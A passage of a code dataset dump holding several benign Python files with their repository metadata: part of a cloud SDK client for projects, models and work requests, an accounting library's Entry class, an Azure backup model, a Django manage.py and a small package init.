                "list_projects got unknown kwargs: {!r}".format(extra_kwargs))
        # Validate enum-valued filters before building the request.
        if 'lifecycle_state' in kwargs:
            lifecycle_state_allowed_values = ["ACTIVE", "CREATING", "FAILED", "DELETING", "DELETED", "UPDATING"]
            if kwargs['lifecycle_state'] not in lifecycle_state_allowed_values:
                raise ValueError(
                    "Invalid value for `lifecycle_state`, must be one of {0}".format(lifecycle_state_allowed_values)
                )
        if 'sort_order' in kwargs:
            sort_order_allowed_values = ["ASC", "DESC"]
            if kwargs['sort_order'] not in sort_order_allowed_values:
                raise ValueError(
                    "Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
                )
        if 'sort_by' in kwargs:
            sort_by_allowed_values = ["timeCreated", "displayName"]
            if kwargs['sort_by'] not in sort_by_allowed_values:
                raise ValueError(
                    "Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
                )
        query_params = {
            "compartmentId": compartment_id,
            "lifecycleState": kwargs.get("lifecycle_state", missing),
            "displayName": kwargs.get("display_name", missing),
            "limit": kwargs.get("limit", missing),
            "page": kwargs.get("page", missing),
            "sortOrder": kwargs.get("sort_order", missing),
            "sortBy": kwargs.get("sort_by", missing)
        }
        # Drop `missing`/None entries so only explicitly-set values are sent.
        query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
        header_params = {
            "accept": "application/json",
            "content-type": "application/json",
            "opc-request-id": kwargs.get("opc_request_id", missing)
        }
        header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
        # Per-call retry strategy takes precedence over the client-wide one.
        retry_strategy = self.base_client.get_preferred_retry_strategy(
            operation_retry_strategy=kwargs.get('retry_strategy'),
            client_retry_strategy=self.retry_strategy
        )
        if retry_strategy:
            if not isinstance(retry_strategy, retry.NoneRetryStrategy):
                self.base_client.add_opc_client_retries_header(header_params)
                retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
            return retry_strategy.make_retrying_call(
                self.base_client.call_api,
                resource_path=resource_path,
                method=method,
                query_params=query_params,
                header_params=header_params,
                response_type="ProjectCollection")
        else:
            return self.base_client.call_api(
                resource_path=resource_path,
                method=method,
                query_params=query_params,
                header_params=header_params,
                response_type="ProjectCollection")
    def list_work_request_errors(self, work_request_id, **kwargs):
        """List errors for a work request as a ``WorkRequestErrorCollection``.

        :param str work_request_id: (required) OCID of the work request;
            must not be None, empty or whitespace.
        :param kwargs: optional ``opc_request_id``, ``page``, ``limit`` and a
            per-call ``retry_strategy``.
        :raises ValueError: on unknown kwargs or an empty path parameter.
        """
        resource_path = "/workRequests/{workRequestId}/errors"
        method = "GET"
        # Don't accept unknown kwargs
        expected_kwargs = [
            "retry_strategy",
            "opc_request_id",
            "page",
            "limit"
        ]
        extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
        if extra_kwargs:
            raise ValueError(
                "list_work_request_errors got unknown kwargs: {!r}".format(extra_kwargs))
        path_params = {
            "workRequestId": work_request_id
        }
        path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
        # Path parameters are substituted into the URL and must be non-empty.
        for (k, v) in six.iteritems(path_params):
            if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
                raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
        query_params = {
            "page": kwargs.get("page", missing),
            "limit": kwargs.get("limit", missing)
        }
        query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
        header_params = {
            "accept": "application/json",
            "content-type": "application/json",
            "opc-request-id": kwargs.get("opc_request_id", missing)
        }
        header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
        # Per-call retry strategy takes precedence over the client-wide one.
        retry_strategy = self.base_client.get_preferred_retry_strategy(
            operation_retry_strategy=kwargs.get('retry_strategy'),
            client_retry_strategy=self.retry_strategy
        )
        if retry_strategy:
            if not isinstance(retry_strategy, retry.NoneRetryStrategy):
                self.base_client.add_opc_client_retries_header(header_params)
                retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
            return retry_strategy.make_retrying_call(
                self.base_client.call_api,
                resource_path=resource_path,
                method=method,
                path_params=path_params,
                query_params=query_params,
                header_params=header_params,
                response_type="WorkRequestErrorCollection")
        else:
            return self.base_client.call_api(
                resource_path=resource_path,
                method=method,
                path_params=path_params,
                query_params=query_params,
                header_params=header_params,
                response_type="WorkRequestErrorCollection")
    def list_work_request_logs(self, work_request_id, **kwargs):
        """List log entries for a work request as a ``WorkRequestLogEntryCollection``.

        :param str work_request_id: (required) OCID of the work request;
            must not be None, empty or whitespace.
        :param kwargs: optional ``opc_request_id``, ``page``, ``limit`` and a
            per-call ``retry_strategy``.
        :raises ValueError: on unknown kwargs or an empty path parameter.
        """
        resource_path = "/workRequests/{workRequestId}/logs"
        method = "GET"
        # Reject any keyword argument that is not part of this operation.
        expected_kwargs = [
            "retry_strategy",
            "opc_request_id",
            "page",
            "limit"
        ]
        extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
        if extra_kwargs:
            raise ValueError(
                "list_work_request_logs got unknown kwargs: {!r}".format(extra_kwargs))
        path_params = {
            "workRequestId": work_request_id
        }
        path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
        # Path parameters are substituted into the URL and must be non-empty.
        for (k, v) in six.iteritems(path_params):
            if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
                raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
        query_params = {
            "page": kwargs.get("page", missing),
            "limit": kwargs.get("limit", missing)
        }
        query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
        header_params = {
            "accept": "application/json",
            "content-type": "application/json",
            "opc-request-id": kwargs.get("opc_request_id", missing)
        }
        header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
        # Per-call retry strategy takes precedence over the client-wide one.
        retry_strategy = self.base_client.get_preferred_retry_strategy(
            operation_retry_strategy=kwargs.get('retry_strategy'),
            client_retry_strategy=self.retry_strategy
        )
        if retry_strategy:
            if not isinstance(retry_strategy, retry.NoneRetryStrategy):
                self.base_client.add_opc_client_retries_header(header_params)
                retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
            return retry_strategy.make_retrying_call(
                self.base_client.call_api,
                resource_path=resource_path,
                method=method,
                path_params=path_params,
                query_params=query_params,
                header_params=header_params,
                response_type="WorkRequestLogEntryCollection")
        else:
            return self.base_client.call_api(
                resource_path=resource_path,
                method=method,
                path_params=path_params,
                query_params=query_params,
                header_params=header_params,
                response_type="WorkRequestLogEntryCollection")
    def list_work_requests(self, compartment_id, **kwargs):
        """List work requests in a compartment as a ``WorkRequestSummaryCollection``.

        :param str compartment_id: (required) OCID of the compartment to query.
        :param kwargs: optional ``work_request_id`` filter, ``opc_request_id``,
            ``page``, ``limit`` and a per-call ``retry_strategy``.
        :raises ValueError: on unknown kwargs.
        """
        resource_path = "/workRequests"
        method = "GET"
        # Don't accept unknown kwargs
        expected_kwargs = [
            "retry_strategy",
            "work_request_id",
            "opc_request_id",
            "page",
            "limit"
        ]
        extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
        if extra_kwargs:
            raise ValueError(
                "list_work_requests got unknown kwargs: {!r}".format(extra_kwargs))
        query_params = {
            "compartmentId": compartment_id,
            "workRequestId": kwargs.get("work_request_id", missing),
            "page": kwargs.get("page", missing),
            "limit": kwargs.get("limit", missing)
        }
        # Drop `missing`/None entries so only explicitly-set values are sent.
        query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}
        header_params = {
            "accept": "application/json",
            "content-type": "application/json",
            "opc-request-id": kwargs.get("opc_request_id", missing)
        }
        header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
        # Per-call retry strategy takes precedence over the client-wide one.
        retry_strategy = self.base_client.get_preferred_retry_strategy(
            operation_retry_strategy=kwargs.get('retry_strategy'),
            client_retry_strategy=self.retry_strategy
        )
        if retry_strategy:
            if not isinstance(retry_strategy, retry.NoneRetryStrategy):
                self.base_client.add_opc_client_retries_header(header_params)
                retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
            return retry_strategy.make_retrying_call(
                self.base_client.call_api,
                resource_path=resource_path,
                method=method,
                query_params=query_params,
                header_params=header_params,
                response_type="WorkRequestSummaryCollection")
        else:
            return self.base_client.call_api(
                resource_path=resource_path,
                method=method,
                query_params=query_params,
                header_params=header_params,
                response_type="WorkRequestSummaryCollection")
    def update_ai_private_endpoint(self, ai_private_endpoint_id, update_ai_private_endpoint_details, **kwargs):
        """Update an AI private endpoint via ``PUT /aiPrivateEndpoints/{id}``.

        :param str ai_private_endpoint_id: (required) OCID of the endpoint;
            must not be None, empty or whitespace.
        :param update_ai_private_endpoint_details: request body with the
            fields to update.
        :param kwargs: optional ``if_match`` (optimistic-locking ETag),
            ``opc_request_id`` and a per-call ``retry_strategy``.
        :raises ValueError: on unknown kwargs or an empty path parameter.
        """
        resource_path = "/aiPrivateEndpoints/{aiPrivateEndpointId}"
        method = "PUT"
        # Reject any keyword argument that is not part of this operation.
        expected_kwargs = [
            "retry_strategy",
            "if_match",
            "opc_request_id"
        ]
        extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
        if extra_kwargs:
            raise ValueError(
                "update_ai_private_endpoint got unknown kwargs: {!r}".format(extra_kwargs))
        path_params = {
            "aiPrivateEndpointId": ai_private_endpoint_id
        }
        path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
        # Path parameters are substituted into the URL and must be non-empty.
        for (k, v) in six.iteritems(path_params):
            if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
                raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
        header_params = {
            "accept": "application/json",
            "content-type": "application/json",
            "if-match": kwargs.get("if_match", missing),
            "opc-request-id": kwargs.get("opc_request_id", missing)
        }
        header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
        # Per-call retry strategy takes precedence over the client-wide one.
        retry_strategy = self.base_client.get_preferred_retry_strategy(
            operation_retry_strategy=kwargs.get('retry_strategy'),
            client_retry_strategy=self.retry_strategy
        )
        if retry_strategy:
            if not isinstance(retry_strategy, retry.NoneRetryStrategy):
                self.base_client.add_opc_client_retries_header(header_params)
                retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
            # NOTE(review): unlike update_data_asset/update_project no
            # response_type is passed here -- presumably the operation is
            # work-request driven; confirm against the service spec.
            return retry_strategy.make_retrying_call(
                self.base_client.call_api,
                resource_path=resource_path,
                method=method,
                path_params=path_params,
                header_params=header_params,
                body=update_ai_private_endpoint_details)
        else:
            return self.base_client.call_api(
                resource_path=resource_path,
                method=method,
                path_params=path_params,
                header_params=header_params,
                body=update_ai_private_endpoint_details)
    def update_data_asset(self, data_asset_id, update_data_asset_details, **kwargs):
        """Update a data asset via ``PUT /dataAssets/{id}``; returns a ``DataAsset``.

        :param str data_asset_id: (required) OCID of the data asset;
            must not be None, empty or whitespace.
        :param update_data_asset_details: request body with the fields to update.
        :param kwargs: optional ``if_match`` (optimistic-locking ETag),
            ``opc_request_id`` and a per-call ``retry_strategy``.
        :raises ValueError: on unknown kwargs or an empty path parameter.
        """
        resource_path = "/dataAssets/{dataAssetId}"
        method = "PUT"
        # Don't accept unknown kwargs
        expected_kwargs = [
            "retry_strategy",
            "if_match",
            "opc_request_id"
        ]
        extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
        if extra_kwargs:
            raise ValueError(
                "update_data_asset got unknown kwargs: {!r}".format(extra_kwargs))
        path_params = {
            "dataAssetId": data_asset_id
        }
        path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
        # Path parameters are substituted into the URL and must be non-empty.
        for (k, v) in six.iteritems(path_params):
            if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
                raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
        header_params = {
            "accept": "application/json",
            "content-type": "application/json",
            "if-match": kwargs.get("if_match", missing),
            "opc-request-id": kwargs.get("opc_request_id", missing)
        }
        header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
        # Per-call retry strategy takes precedence over the client-wide one.
        retry_strategy = self.base_client.get_preferred_retry_strategy(
            operation_retry_strategy=kwargs.get('retry_strategy'),
            client_retry_strategy=self.retry_strategy
        )
        if retry_strategy:
            if not isinstance(retry_strategy, retry.NoneRetryStrategy):
                self.base_client.add_opc_client_retries_header(header_params)
                retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
            return retry_strategy.make_retrying_call(
                self.base_client.call_api,
                resource_path=resource_path,
                method=method,
                path_params=path_params,
                header_params=header_params,
                body=update_data_asset_details,
                response_type="DataAsset")
        else:
            return self.base_client.call_api(
                resource_path=resource_path,
                method=method,
                path_params=path_params,
                header_params=header_params,
                body=update_data_asset_details,
                response_type="DataAsset")
    def update_model(self, model_id, update_model_details, **kwargs):
        """Update a model via ``PUT /models/{modelId}``.

        :param str model_id: (required) OCID of the model; must not be None,
            empty or whitespace.
        :param update_model_details: request body with the fields to update.
        :param kwargs: optional ``if_match`` (optimistic-locking ETag),
            ``opc_request_id`` and a per-call ``retry_strategy``.
        :raises ValueError: on unknown kwargs or an empty path parameter.
        """
        resource_path = "/models/{modelId}"
        method = "PUT"
        # Reject any keyword argument that is not part of this operation.
        expected_kwargs = [
            "retry_strategy",
            "if_match",
            "opc_request_id"
        ]
        extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
        if extra_kwargs:
            raise ValueError(
                "update_model got unknown kwargs: {!r}".format(extra_kwargs))
        path_params = {
            "modelId": model_id
        }
        path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
        # Path parameters are substituted into the URL and must be non-empty.
        for (k, v) in six.iteritems(path_params):
            if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
                raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
        header_params = {
            "accept": "application/json",
            "content-type": "application/json",
            "if-match": kwargs.get("if_match", missing),
            "opc-request-id": kwargs.get("opc_request_id", missing)
        }
        header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
        # Per-call retry strategy takes precedence over the client-wide one.
        retry_strategy = self.base_client.get_preferred_retry_strategy(
            operation_retry_strategy=kwargs.get('retry_strategy'),
            client_retry_strategy=self.retry_strategy
        )
        if retry_strategy:
            if not isinstance(retry_strategy, retry.NoneRetryStrategy):
                self.base_client.add_opc_client_retries_header(header_params)
                retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
            # NOTE(review): no response_type is passed here (unlike
            # update_data_asset) -- presumably work-request driven; confirm.
            return retry_strategy.make_retrying_call(
                self.base_client.call_api,
                resource_path=resource_path,
                method=method,
                path_params=path_params,
                header_params=header_params,
                body=update_model_details)
        else:
            return self.base_client.call_api(
                resource_path=resource_path,
                method=method,
                path_params=path_params,
                header_params=header_params,
                body=update_model_details)
    def update_project(self, project_id, update_project_details, **kwargs):
        """Update a project via ``PUT /projects/{projectId}``; returns a ``Project``.

        :param str project_id: (required) OCID of the project; must not be
            None, empty or whitespace.
        :param update_project_details: request body with the fields to update.
        :param kwargs: optional ``if_match`` (optimistic-locking ETag),
            ``opc_request_id`` and a per-call ``retry_strategy``.
        :raises ValueError: on unknown kwargs or an empty path parameter.
        """
        resource_path = "/projects/{projectId}"
        method = "PUT"
        # Don't accept unknown kwargs
        expected_kwargs = [
            "retry_strategy",
            "if_match",
            "opc_request_id"
        ]
        extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
        if extra_kwargs:
            raise ValueError(
                "update_project got unknown kwargs: {!r}".format(extra_kwargs))
        path_params = {
            "projectId": project_id
        }
        path_params = {k: v for (k, v) in six.iteritems(path_params) if v is not missing}
        # Path parameters are substituted into the URL and must be non-empty.
        for (k, v) in six.iteritems(path_params):
            if v is None or (isinstance(v, six.string_types) and len(v.strip()) == 0):
                raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(k))
        header_params = {
            "accept": "application/json",
            "content-type": "application/json",
            "if-match": kwargs.get("if_match", missing),
            "opc-request-id": kwargs.get("opc_request_id", missing)
        }
        header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}
        # Per-call retry strategy takes precedence over the client-wide one.
        retry_strategy = self.base_client.get_preferred_retry_strategy(
            operation_retry_strategy=kwargs.get('retry_strategy'),
            client_retry_strategy=self.retry_strategy
        )
        if retry_strategy:
            if not isinstance(retry_strategy, retry.NoneRetryStrategy):
                self.base_client.add_opc_client_retries_header(header_params)
                retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
            return retry_strategy.make_retrying_call(
                self.base_client.call_api,
                resource_path=resource_path,
                method=method,
                path_params=path_params,
                header_params=header_params,
                body=update_project_details,
                response_type="Project")
        else:
            return self.base_client.call_api(
                resource_path=resource_path,
                method=method,
                path_params=path_params,
                header_params=header_params,
                body=update_project_details,
                response_type="Project")
| true | true |
1c2c86dbcc5a343b86f1588a38a45c5d4e0e5f59 | 4,341 | py | Python | amatino/entry.py | Amatino-Code/amatino-python | 6c5f66b2e61bede5bf9d3e6eee8130a16f511a5f | [
"MIT"
] | 2 | 2018-07-20T20:00:33.000Z | 2020-10-08T15:49:06.000Z | amatino/entry.py | Amatino-Code/amatino-python | 6c5f66b2e61bede5bf9d3e6eee8130a16f511a5f | [
"MIT"
] | 1 | 2020-05-21T02:49:29.000Z | 2020-05-21T02:49:29.000Z | amatino/entry.py | Amatino-Code/amatino-python | 6c5f66b2e61bede5bf9d3e6eee8130a16f511a5f | [
"MIT"
] | 3 | 2018-09-03T09:31:31.000Z | 2020-05-21T05:30:00.000Z | """
Amatino API Python Bindings
Entry Module
Author: hugh@amatino.io
"""
from amatino.side import Side
from amatino.account import Account
from amatino.internal.constrained_string import ConstrainedString
from amatino.internal.encodable import Encodable
from amatino.internal.immutable import Immutable
from decimal import Decimal
from typing import Dict
from typing import Any
from typing import TypeVar
from typing import Optional
from typing import Type
from typing import List
T = TypeVar('T', bound='Entry')
class Entry(Encodable):
    """
    Entries compose Transactions. An individual entry allocates some value to
    an Account as either one of the fundamental Sides: a debit or a credit.
    All together, those debits and credits will add up to zero, satisfying the
    fundamental double-entry accounting equality.
    """
    # Upper bound enforced on entry descriptions (via ConstrainedString).
    MAX_DESCRIPTION_LENGTH = 1024
    def __init__(
        self,
        side: Side,
        amount: Decimal,
        account: Optional[Account] = None,
        description: Optional[str] = None,
        account_id: Optional[int] = None
    ) -> None:
        """Create an Entry from either an Account or an explicit account_id.

        If ``account_id`` is given it wins; otherwise ``account`` must be an
        Account and its id is used. Raises TypeError on wrong argument types.
        """
        if not isinstance(side, Side):
            raise TypeError('side must be of type `Side`')
        if not isinstance(amount, Decimal):
            raise TypeError('amount must be of type `Decimal`')
        self._side = side
        if account_id is not None:
            assert isinstance(account_id, int)
            self._account_id = account_id
        else:
            if not isinstance(account, Account):
                raise TypeError('account must be of type `Account`')
            self._account_id = account.id_
        self._amount = amount
        self._description = Entry._Description(description)
        return
    # Read-only accessors exposed through the Immutable descriptor.
    side = Immutable(lambda s: s._side)
    account_id = Immutable(lambda s: s._account_id)
    amount = Immutable(lambda s: s._amount)
    description = Immutable(lambda s: s._description)
    def serialise(self) -> Dict[str, Any]:
        """Return the API-ready dict representation of this Entry."""
        data = {
            'account_id': self._account_id,
            'amount': str(self._amount),
            'description': self._description.serialise(),
            'side': self._side.value
        }
        return data
    class _Description(Encodable):
        """Length-constrained description; None becomes an empty string."""
        def __init__(self, string: Optional[str]) -> None:
            if string is not None and not isinstance(string, str):
                raise TypeError('description must be of type `str` or None')
            if string is None:
                string = ''
            self._description = ConstrainedString(
                string,
                'description',
                Entry.MAX_DESCRIPTION_LENGTH
            )
            return
        def serialise(self) -> str:
            return str(self._description)
    @classmethod
    def create(
        cls: Type[T],
        side: Side,
        amount: Decimal,
        account: Account,
        description: Optional[str] = None
    ) -> T:
        """Convenience constructor taking an Account rather than an id."""
        return cls(side, amount, account=account, description=description)
    @classmethod
    def create_balanced_pair(
        cls: Type[T],
        debit_account: Account,
        credit_account: Account,
        amount: Decimal,
        description: Optional[str] = None
    ) -> List[T]:
        """Return a [debit, credit] pair of equal amount (nets to zero)."""
        debit = cls(Side.debit, amount, debit_account, description)
        credit = cls(Side.credit, amount, credit_account, description)
        return [debit, credit]
    @classmethod
    def plug(
        cls: Type[T],
        account: Account,
        entries: List[T],
        description: Optional[str] = None
    ) -> Optional[T]:
        """
        Return an entry plugging the balance gap in a given set of Entries. Or,
        return None if the Entries already balance.
        """
        if False in [isinstance(e, Entry) for e in entries]:
            raise TypeError('Entries must be of type List[Entry]')
        debits = sum([e.amount for e in entries if e.side == Side.debit])
        credits_ = sum([e.amount for e in entries if e.side == Side.credit])
        if debits == credits_:
            return None
        # Plug on the lighter side with the absolute difference.
        if debits > credits_:
            plug_side = Side.credit
            amount = Decimal(debits - credits_)
        else:
            plug_side = Side.debit
            amount = Decimal(credits_ - debits)
        return cls(plug_side, amount, account, description)
| 30.356643 | 79 | 0.615066 | from amatino.side import Side
from amatino.account import Account
from amatino.internal.constrained_string import ConstrainedString
from amatino.internal.encodable import Encodable
from amatino.internal.immutable import Immutable
from decimal import Decimal
from typing import Dict
from typing import Any
from typing import TypeVar
from typing import Optional
from typing import Type
from typing import List
T = TypeVar('T', bound='Entry')
class Entry(Encodable):
    """A debit or credit of some amount against an Account.

    Entries compose Transactions; across a transaction the debits and
    credits sum to zero (double-entry equality).
    """
    # Upper bound enforced on entry descriptions (via ConstrainedString).
    MAX_DESCRIPTION_LENGTH = 1024
    def __init__(
        self,
        side: Side,
        amount: Decimal,
        account: Optional[Account] = None,
        description: Optional[str] = None,
        account_id: Optional[int] = None
    ) -> None:
        """Create an Entry; ``account_id`` takes precedence over ``account``."""
        if not isinstance(side, Side):
            raise TypeError('side must be of type `Side`')
        if not isinstance(amount, Decimal):
            raise TypeError('amount must be of type `Decimal`')
        self._side = side
        if account_id is not None:
            assert isinstance(account_id, int)
            self._account_id = account_id
        else:
            if not isinstance(account, Account):
                raise TypeError('account must be of type `Account`')
            self._account_id = account.id_
        self._amount = amount
        self._description = Entry._Description(description)
        return
    # Read-only accessors exposed through the Immutable descriptor.
    side = Immutable(lambda s: s._side)
    account_id = Immutable(lambda s: s._account_id)
    amount = Immutable(lambda s: s._amount)
    description = Immutable(lambda s: s._description)
    def serialise(self) -> Dict[str, Any]:
        """Return the API-ready dict representation of this Entry."""
        data = {
            'account_id': self._account_id,
            'amount': str(self._amount),
            'description': self._description.serialise(),
            'side': self._side.value
        }
        return data
    class _Description(Encodable):
        """Length-constrained description; None becomes an empty string."""
        def __init__(self, string: Optional[str]) -> None:
            if string is not None and not isinstance(string, str):
                raise TypeError('description must be of type `str` or None')
            if string is None:
                string = ''
            self._description = ConstrainedString(
                string,
                'description',
                Entry.MAX_DESCRIPTION_LENGTH
            )
            return
        def serialise(self) -> str:
            return str(self._description)
    @classmethod
    def create(
        cls: Type[T],
        side: Side,
        amount: Decimal,
        account: Account,
        description: Optional[str] = None
    ) -> T:
        """Convenience constructor taking an Account rather than an id."""
        return cls(side, amount, account=account, description=description)
    @classmethod
    def create_balanced_pair(
        cls: Type[T],
        debit_account: Account,
        credit_account: Account,
        amount: Decimal,
        description: Optional[str] = None
    ) -> List[T]:
        """Return a [debit, credit] pair of equal amount (nets to zero)."""
        debit = cls(Side.debit, amount, debit_account, description)
        credit = cls(Side.credit, amount, credit_account, description)
        return [debit, credit]
    @classmethod
    def plug(
        cls: Type[T],
        account: Account,
        entries: List[T],
        description: Optional[str] = None
    ) -> Optional[T]:
        """Return an Entry balancing ``entries``, or None if already balanced."""
        if False in [isinstance(e, Entry) for e in entries]:
            raise TypeError('Entries must be of type List[Entry]')
        debits = sum([e.amount for e in entries if e.side == Side.debit])
        credits_ = sum([e.amount for e in entries if e.side == Side.credit])
        if debits == credits_:
            return None
        # Plug on the lighter side with the absolute difference.
        if debits > credits_:
            plug_side = Side.credit
            amount = Decimal(debits - credits_)
        else:
            plug_side = Side.debit
            amount = Decimal(credits_ - debits)
        return cls(plug_side, amount, account, description)
| true | true |
1c2c872739c70760c2acb09a3e43c88a93ad2117 | 1,095 | py | Python | azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/models/recovery_point.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 4 | 2016-06-17T23:25:29.000Z | 2022-03-30T22:37:45.000Z | azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/models/recovery_point.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 54 | 2016-03-25T17:25:01.000Z | 2018-10-22T17:27:54.000Z | azure-mgmt-recoveryservicesbackup/azure/mgmt/recoveryservicesbackup/models/recovery_point.py | v-Ajnava/azure-sdk-for-python | a1f6f80eb5869c5b710e8bfb66146546697e2a6f | [
"MIT"
] | 3 | 2016-05-03T20:49:46.000Z | 2017-10-05T21:05:27.000Z | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class RecoveryPoint(Model):
    """Base class for backup copies. Workload-specific backup copies are derived
    from this class.
    :param object_type: Polymorphic Discriminator
    :type object_type: str
    """
    # object_type must always be present for polymorphic deserialization.
    _validation = {
        'object_type': {'required': True},
    }
    # Maps the Python attribute to its wire name and msrest type.
    _attribute_map = {
        'object_type': {'key': 'objectType', 'type': 'str'},
    }
    # Discriminator values selecting the concrete subclass on deserialization.
    _subtype_map = {
        'object_type': {'GenericRecoveryPoint': 'GenericRecoveryPoint', 'IaasVMRecoveryPoint': 'IaasVMRecoveryPoint'}
    }
    def __init__(self):
        # Subclasses/deserializer fill in the concrete discriminator value.
        self.object_type = None
| 29.594595 | 117 | 0.593607 |
from msrest.serialization import Model
class RecoveryPoint(Model):
_validation = {
'object_type': {'required': True},
}
_attribute_map = {
'object_type': {'key': 'objectType', 'type': 'str'},
}
_subtype_map = {
'object_type': {'GenericRecoveryPoint': 'GenericRecoveryPoint', 'IaasVMRecoveryPoint': 'IaasVMRecoveryPoint'}
}
def __init__(self):
self.object_type = None
| true | true |
1c2c884d9cde661100911e4d30b0255ffac3b8d3 | 645 | py | Python | ecom/manage.py | TomSCoding/ecommerce-base | 7057afe83277209fef53fda44e3e8c84afc57bde | [
"MIT"
] | null | null | null | ecom/manage.py | TomSCoding/ecommerce-base | 7057afe83277209fef53fda44e3e8c84afc57bde | [
"MIT"
] | 277 | 2019-10-11T06:58:27.000Z | 2022-03-12T00:50:30.000Z | ecom/manage.py | TomSCoding/ecommerce-base | 7057afe83277209fef53fda44e3e8c84afc57bde | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Entry point of Django's command-line utility for this project."""
    # Make sure Django resolves settings from this project before any
    # framework import happens.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ecom.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from exc
    execute_from_command_line(sys.argv)
if __name__ == '__main__':
    main()
| 29.318182 | 74 | 0.658915 |
import os
import sys
def main():
    """Run Django's administrative command-line utility."""
    # Point Django at this project's settings module before importing it.
    os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'ecom.settings')
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        # Re-raise with a friendlier hint, preserving the original cause.
        raise ImportError(
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        ) from exc
    execute_from_command_line(sys.argv)
if __name__ == '__main__':
    main()
| true | true |
1c2c88ca6b1582f01056302f4059664684a16f5a | 121 | py | Python | backend/core/services/__init__.py | devalv/yawm | 9f91b96cf6b9a9a1f2026d514ea24edda117e1ba | [
"MIT"
] | 1 | 2021-12-26T00:10:15.000Z | 2021-12-26T00:10:15.000Z | backend/core/services/__init__.py | devalv/yawm | 9f91b96cf6b9a9a1f2026d514ea24edda117e1ba | [
"MIT"
] | 7 | 2020-11-07T16:42:47.000Z | 2022-01-21T23:51:38.000Z | backend/core/services/__init__.py | devalv/yawm | 9f91b96cf6b9a9a1f2026d514ea24edda117e1ba | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
"""Project business logic."""
from .web import get_product_name
__all__ = ["get_product_name"]
| 17.285714 | 33 | 0.677686 |
from .web import get_product_name
__all__ = ["get_product_name"]
| true | true |
1c2c8cec61fdb4270ad2b309273d6a5fc2928f1a | 8,463 | py | Python | amfe/mor/hyper_red/ecsw.py | ma-kast/AMfe | 99686cc313fb8904a093fb42e6cf0b38f8cfd791 | [
"BSD-3-Clause"
] | null | null | null | amfe/mor/hyper_red/ecsw.py | ma-kast/AMfe | 99686cc313fb8904a093fb42e6cf0b38f8cfd791 | [
"BSD-3-Clause"
] | null | null | null | amfe/mor/hyper_red/ecsw.py | ma-kast/AMfe | 99686cc313fb8904a093fb42e6cf0b38f8cfd791 | [
"BSD-3-Clause"
] | null | null | null | """
